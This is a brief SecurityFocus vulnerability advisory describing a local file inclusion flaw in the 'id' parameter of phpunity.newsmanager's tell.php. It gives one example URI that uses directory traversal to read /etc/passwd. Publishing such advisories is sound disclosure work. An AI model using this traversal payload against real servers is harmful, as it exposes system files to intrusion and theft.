phpunity.newsmanager 'id' Parameter Local File Include Vulnerability

Attackers may exploit this issue through a browser.

The following example URIs is available:

http://www.example.com/phpunity.newsmanager/phpunity-newsmanager/misc/tell_a_friend/tell.php?id=../../../../../../../etc/passwd


 

Privacy Statement
Copyright 2010, SecurityFocus